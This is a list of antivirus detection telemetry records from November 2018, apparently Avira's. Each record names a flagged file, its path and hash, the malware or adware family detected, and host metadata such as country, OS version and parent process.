  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-07-04-23.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T00:14:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132724-6079aedf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132724-6079AEDF', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:27:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jetupdate.exe', filepath='C:\\Program Files\\JetAudio\\jetUpdate.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='90864d19d2b2cf26f03973e34c494eafe5889ec522117388f064ec8614bf3c3f', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T14:25:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165346-49adfa0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ebe48554\\AVSCAN-20181104-165143-387DDB14\\AVSCAN-20181104-165346-49ADFA0D', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:53:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-144152-1691a25a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6125d533\\AVSCAN-20181104-135312-59F9F13F\\AVSCAN-20181104-144152-1691A25A', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='9a8423d813950488a6b7d026f605486c3c56eafb8555750e2b0274f808d4c356', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:11:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='panorama.dll', filepath='E:\\Dota2\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='7b10276e5701c1a391e40686cbe8e2dd94256bd6d9bb74387d81e86c825eb970', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:11:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T20:19:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9610323\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/RR \\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\adobe-photoshop-cs6_2741761334.exe', parentsize=2416615, timestamp='2018-11-04T04:19:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:25:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0002444e', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0002444e', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:52:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0182789.exe', filepath='d:\\system volume information\\_restore{a0838581-84a6-4d91-8040-c33e0d667479}\\rp106\\A0182789.exe', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='99e54f93d14d14cf33ebd3572cbc8f18281436d38099f7f0bb8fd16a8f45bf90', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:38:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='libegl.dll', filepath='\\\\?\\C:\\Program Files\\crxbro Browser\\crxbro\\libegl.dll', filesize=80000, name='TR/Ghokswa.bbago.#M1.#R1'), hash='608157045d1092d1192901f7476b7aaabdd1237ef69ac4539c0ed85b7a374921', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:21:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T23:58:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-064019-2864d87b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_61278a58\\AVSCAN-20181104-063957-2551AB9C\\AVSCAN-20181104-064019-2864D87B', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:40:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221016-82c753be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b20193d5\\AVSCAN-20181104-220921-7D4ADBEA\\AVSCAN-20181104-221016-82C753BE', filesize=756000, name='PUA/SearchProtect.Gen.#M1.#R1'), hash='65b7afa0c263db4e3ff726247d5864ae4463c7618bd9756e486a2c206e97c09f', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:10:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212913-92fcb5dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-212913-92FCB5DD', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:29:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='access.fr-fr.exe', filepath='F:\\Office 20101\\Access.fr-fr.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='NE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3611368, timestamp='2018-11-04T17:19:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='baixaki_audacity_vhvpcd.exe', filepath='C:\\Users\\X\\Downloads\\Baixaki_audacity_VhvPCd.exe', filesize=1844000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='423193b530b82466c1c001b1347fcac61f8a0f4dd1402e911b85d4458d8bd26b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-04T17:17:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:03:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='programmini e utilità.scr', filepath='G:\\Programmini e utilità\\Programmini e utilità.scr', filesize=512000, name='TR/Chydo.TF.#M1.#R1'), hash='ba6c820d9281c89bd6fb700d5485676e7e4a5450ff7f1d66ca8d237933515100', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T09:55:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='devcon.exe', filepath='C:\\PROGRAM FILES\\PowerISO\\devcon.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='d3dce0830e813e6c74f210472dbf54dfe74fe8ec519afc5afbca428f3a84e8fc', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T12:56:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215927-88014f79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa78dab4\\AVSCAN-20181104-215047-4793A06D\\AVSCAN-20181104-215927-88014F79', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:59:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rnsy919.exe', filepath='C:\\Users\\X\\AppData\\Local\\4A078520-1432572570-11E2-990F-089E01585879\\rnsy919.exe', filesize=128000, name='HEUR/AGEN.1029157.#M1.#R1'), hash='248d163a709d044da15cc6be8d75faf3ffef38d473765f0b4b08e6afbe553503', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:y2GXSJEeTUuIPWwi.1', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T10:02:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T14:53:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T22:26:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212541-6416c573', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01434177\\AVSCAN-20181104-210731-0BCFB3D0\\AVSCAN-20181104-212541-6416C573', filesize=1280000, name='Adware/FileTour.mzyvw.#M1.#R1'), hash='564ede05ee9f2dd1f883ec900cc98e114f7f3a9adc85272216a785d2ce00339b', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:25:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165917-ebb0c758', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-155710-6095B825\\AVSCAN-20181104-165917-EBB0C758', filesize=256000, name='TR/AD.Inject.Y.#M1.#R1'), hash='4ef0a023932d5f073dd817ae3a7b569f22edbed4afc4e6728f7dcc5884584283', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:59:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mvp16_tool.exe', filepath='C:\\Program Files\\MVP Baseball 16\\MVP16_Tool.exe', filesize=1216000, name='HEUR/AGEN.1034262.#M1.#R1'), hash='2b17d6f6b7e21cc644ab6f3134f5ecc9aaf3fc29bc9f2d87e61735a5560e1034', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:hacvsyUZBkqKmD4K.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T12:48:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_1c8a1998.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_1c8a1998.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sith.exe', filepath='\\\\?\\E:\\games\\حرب الكواكب\\Sith.exe', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='70ba32496c624683b6b430d96a9e8c0a88fd5567fdf9f5d8b25d434c03116867', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:35:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-075904-0e167f13', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7bb1b655\\AVSCAN-20181104-075238-EEAFA995\\AVSCAN-20181104-075904-0E167F13', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='8d271e03cf169e0b53c74373d21ca68b16568297da1f1418647457e01696a336', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:59:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cdnlink.exe', filepath='\\\\?\\C:\\Program Files (x86)\\CdnApp\\Cdnlink\\Cdnlink.exe', filesize=192000, name='ADWARE/PublishStream.ckypp.#M1.#R1'), hash='059bc6196102546a84fc675ca48cc855ce884e706b05e8e836f96ed92679dd05', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:23:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='nqtw5 - xii -kttn (a hòa).exe', filepath='G:\\HOC TW6 (KHOA II)\\NQTW5 - XII -KTTN (A Hòa).exe', filesize=1856000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='33d3a8cf907e8b59be97801103c7c6a8fd5fa66ef179ef03cf31d6e1a8b44920', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T16:06:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='patch.exe', filepath='c:\\program files (x86)\\vso\\vso downloader\\5\\patch.exe', filesize=640000, name='HEUR/APC.#M1.#R1'), hash='1c70e47c5dcda1d5bba2698c8380c187376ca5d49950e4feea766d1c430432c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T13:10:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141948-afac1abd', filepath='C:\\WINDOWS\\TEMP\\AvGuardIA_6cb339ec\\AVSCAN-20181104-141835-A14CC27B\\AVSCAN-20181104-141948-AFAC1ABD', filesize=128000, name='APPL/ChromePassV.1.#M1.#R1'), hash='dbfa10a7deeb6d1ac8fd95ffeb23b87adc58e6388e522812fabe7f710e3cdd89', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:19:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='zbanalytics', filepath='/Applications/MacKeeper.app/Contents/Frameworks/ZBAnalytics.framework/Versions/A/ZBAnalytics', filesize=544000, name='OSX/Agent.hok.#M0.#R0'), hash='8710755d03b2e46c91d6a51091aef5da751531f5e23cef664dcc760c2fe57d97', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='14', os_vminor='5', parentproc=None, parentsize=None, timestamp='2018-11-04T11:10:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165416-b8bffb42', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0bc51104\\AVSCAN-20181104-165011-9512470A\\AVSCAN-20181104-165416-B8BFFB42', filesize=128000, name='ADWARE/Adware.Gen7.#M1.#R1'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T10:54:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00001232', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp00001232', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T15:49:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-174214-f942c376', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e5b5006\\AVSCAN-20181104-174117-ED7D5097\\AVSCAN-20181104-174214-F942C376', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:42:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrrvdpkn.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\hrrvdPkn.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:30:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='printqueuecleaner.exe', filepath='E:\\HBCD\\Programs\\PrintQueueCleaner.exe', filesize=64000, name='TR/Agent.64000.116.#M1.#R1'), hash='78fda789cdedfc745466d5fecd1dc02f6320d517cd7c10742964338d3e79d4a9', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T11:07:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ywqrmjnw.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\ywqrmjnw.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:02:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pmzsjmk.exe', filepath='c:\\users\\X\\appdata\\roaming\\pmzsjmk.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:45:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184214-f3edc94f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5657254\\AVSCAN-20181102-184045-E440E557\\AVSCAN-20181102-184214-F3EDC94F', filesize=64000, name='TR/Dropper.Gen.#M1.#R1'), hash='915ab88f04e7d2f0055d60f2c76284852abf31ac7f57d96c87a72b33b68cc46f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:42:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221558-637dba7c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221558-637DBA7C', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='forma1.buhg.2011.xls', filepath='E:\\FreeFiles\\EIAS\\Отчетность\\2013\\до 30.04.2013\\FORMA1.BUHG.2011.xls', filesize=2048000, name='W97M/Dldr.Agent.18758.#M1.#R1'), hash='73345849706f83afbbde98271376d72f2101b73ea099ffa6ddc7c469e1733711', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:01:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b08e0d773939e50d83655c1fe1d9ada4dffefbf9102c94bf37b0f2563e212954.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\B08E0D773939E50D83655C1FE1D9ADA4DFFEFBF9102C94BF37B0F2563E212954.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b08e0d773939e50d83655c1fe1d9ada4dffefbf9102c94bf37b0f2563e212954', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:47:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\破解檔\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='7a538353346d1a0bca614a50c14e009fddf625772e54ea6a1fbe171df460074c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Htg+zIokMUiU6r7A.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T19:01:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-214019-85ca72b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_22e7b271\\AVSCAN-20181101-213011-49CF3C54\\AVSCAN-20181101-214019-85CA72B0', filesize=384000, name='TR/Dldr.Agent.384000.6.#M1.#R1'), hash='f3e96dd9a70330c5bcd4eab84dccf78695638e2b6dfb50c93f967c8bf59ba82b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:40:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183201-fe83f6b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_338913db\\AVSCAN-20181102-183133-FB4CE89A\\AVSCAN-20181102-183201-FE83F6B6', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:32:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='capafe.exe', filepath='\\\\?\\D:\\programs\\canon 810\\English\\WinMeset\\CAPAFE.EXE', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='b176b9019c420b14be9a8ba9bfc21e4cb737e8ccdbb6ebedcfcaacf93f148602', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:03:10Z'), dt=datetime.date(2018, 11, 2)),
